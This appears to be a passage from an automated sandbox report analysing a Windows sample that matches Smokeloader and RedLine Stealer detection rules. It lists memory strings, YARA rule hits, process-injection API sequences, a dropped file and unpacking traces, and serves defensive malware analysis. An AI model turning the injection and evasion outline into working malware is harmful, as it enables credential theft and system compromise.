Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000002.00000002.2717195196.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292315664.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
      Source: explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2722215051.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match | File source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00402FFA RtlCreateUserThread,NtTerminateProcess
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00402379 NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040237B NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040332A RtlInitUnicodeString,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_004020EA NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00402387 NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00402397 NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040239B NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040239E NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00402FFA RtlCreateUserThread,NtTerminateProcess
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00402379 NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0040237B NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0040332A RtlInitUnicodeString,NtEnumerateKey
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_004020EA NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00402387 NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00402397 NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0040239B NtQuerySystemInformation
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_0040239E NtQuerySystemInformation
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040332A
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00418A70
      Source: C:\Windows\explorer.exe | Code function: 2_2_029928D0
      Source: C:\Windows\explorer.exe | Code function: 2_2_085828D0
      Source: C:\Users\user\AppData\Roaming\jtruajj | Code function: 4_2_00418A70
      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\jtruajj F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: RmbF3635xY.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: RmbF3635xY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: jtruajj.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/2@2/2
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_006804BF CreateToolhelp32Snapshot,Module32First
      Source: C:\Windows\explorer.exe | Code function: 2_2_02993678 CoCreateInstance
      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jtruajj
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: RmbF3635xY.exe | ReversingLabs: Detection: 81%
      Source: unknown | Process created: C:\Users\user\Desktop\RmbF3635xY.exe "C:\Users\user\Desktop\RmbF3635xY.exe"
      Source: unknown | Process created: C:\Users\user\AppData\Roaming\jtruajj C:\Users\user\AppData\Roaming\jtruajj
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
      Source: C:\Windows\explorer.exe | Section loaded: webio.dll
      Source: C:\Users\user\AppData\Roaming\jtruajj | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\jtruajj | Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\jtruajj | Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Unpacked PE file: 0.2.RmbF3635xY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\jtruajj | Unpacked PE file: 4.2.jtruajj.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0040237B push 000023C2h; retn 0023h 0_2_0040238B
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_004025DC push ebp; ret 0_2_004025FC
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00401284 pushad ; iretd 0_2_00401286
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_005E2643 push ebp; ret 0_2_005E2663
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_005E12EB pushad ; iretd 0_2_005E12ED
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_005E23E2 push 000023C2h; retn 0023h 0_2_005E23F2
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_0067D864 pushad ; retf 0067h 0_2_0067D865
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00684439 push ebx; ret 0_2_0068443C
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00682D09 push es; retf 0_2_00682D20
      Source: C:\Users\user\Desktop\RmbF3635xY.exe | Code function: 0_2_00687A1C push esp; ret 0_2_00687A1D
